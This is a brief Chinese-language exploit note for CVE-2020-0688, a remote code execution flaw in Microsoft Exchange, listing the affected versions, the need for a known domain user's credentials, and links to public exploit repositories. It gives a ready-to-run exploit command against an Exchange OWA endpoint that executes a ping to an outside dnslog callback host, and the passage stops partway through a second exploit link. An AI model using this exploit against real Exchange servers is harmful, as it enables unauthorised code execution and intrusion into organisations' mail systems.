# CVE-2020-0688 Exchange RCE
前提:
已知一个域用户
影响版本:
-Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30
-Microsoft Exchange Server 2013 Cumulative Update 23
-Microsoft Exchange Server 2016 Cumulative Update 15
-Microsoft Exchange Server 2019 Cumulative Update 4
exp1:
[@Ridter](https://github.com/Ridter/cve-2020-0688)
```
python cve-2020-0688.py -s https://ip/owa/ -u user -p pass -c "ping test.ph4nxq.dnslog.cn"
```
exp2:
[@zcgonvh](https://github.com/zcgonvh/CVE-2020-068